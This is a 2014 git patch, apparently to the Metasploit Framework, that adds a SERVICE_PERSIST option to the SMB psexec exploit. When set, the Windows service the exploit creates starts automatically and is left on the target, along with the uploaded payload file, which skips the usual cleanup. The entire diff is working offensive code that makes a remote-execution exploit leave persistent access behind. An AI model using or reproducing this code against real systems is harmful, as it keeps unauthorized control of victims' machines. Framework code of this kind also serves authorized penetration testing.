From 2c9209f8b19fa00be5b70695f4e93ec92bf4d323 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 5 Apr 2014 18:50:49 +0100 Subject: [PATCH] Auto persist --- lib/msf/core/exploit/smb/psexec.rb | 26 +++++++++++++++++++++++++- modules/exploits/windows/smb/psexec.rb | 20 +++++++++++--------- 2 files changed, 36 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb index 1b043195c2..b9981d3241 100644 --- a/lib/msf/core/exploit/smb/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb @@ -23,18 +23,34 @@ module Exploit::Remote::SMB::Psexec OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]), OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]) ], self.class) + + register_advanced_options( + [ + OptBool.new('SERVICE_PERSIST', [ true, 'Create an Auto run service and do not remove it.', false]) + ], self.class) end + # Retrieve the SERVICE_NAME option, generate a random + # one if not already set. + # + # @return service_name [String] the name of the service. def service_name @service_name ||= datastore['SERVICE_NAME'] @service_name ||= rand_text_alpha(8) end + # Retrieve the SERVICE_DISPLAY_NAME option, generate a random + # one if not already set. + # + # @return service_display_name [String] the display name of the service. def display_name @display_name ||= datastore['SERVICE_DISPLAY_NAME'] @display_name ||= rand_text_alpha(16) end + # Retrieve the SERVICE_DESCRIPTION option + # + # @return service_description [String] the service description. def service_description @service_description ||= datastore['SERVICE_DESCRIPTION'] end @@ -89,8 +105,14 @@ module Exploit::Remote::SMB::Psexec return false unless scm_handle + if datastore['SERVICE_PERSIST'] + opts = { :start => SERVICE_AUTO_START } + else + opts = {} + end + vprint_status("#{peer} - Creating the service...") - svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, {}) + svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, opts) case svc_status when ERROR_SUCCESS @@ -133,6 +155,8 @@ module Exploit::Remote::SMB::Psexec # Maybe we could have a force cleanup option..? if service_exists print_warning("#{peer} - Not removing service as it already existed...") + elsif datastore['SERVICE_PERSIST'] + print_warning("#{peer} - Not removing service for persistance...") else vprint_status("#{peer} - Removing the service...") svc_status = dce_deleteservice(dcerpc, svc_handle) diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index bbcdb8400b..8e6ce240d6 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -196,15 +196,17 @@ class Metasploit3 < Msf::Exploit::Remote psexec(file_location, false) - print_status("Deleting \\#{filename}...") - sleep(1) - #This is not really useful but will prevent double \\ on the wire :) - if datastore['SHARE'] =~ /.[\\\/]/ - simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") - simple.delete("\\#{fileprefix}\\#{filename}") - else - simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") - simple.delete("\\#{filename}") + unless datastore['SERVICE_PERSIST'] + print_status("Deleting \\#{filename}...") + sleep(1) + #This is not really useful but will prevent double \\ on the wire :) + if datastore['SHARE'] =~ /.[\\\/]/ + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + simple.delete("\\#{fileprefix}\\#{filename}") + else + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + simple.delete("\\#{filename}") + end end end handler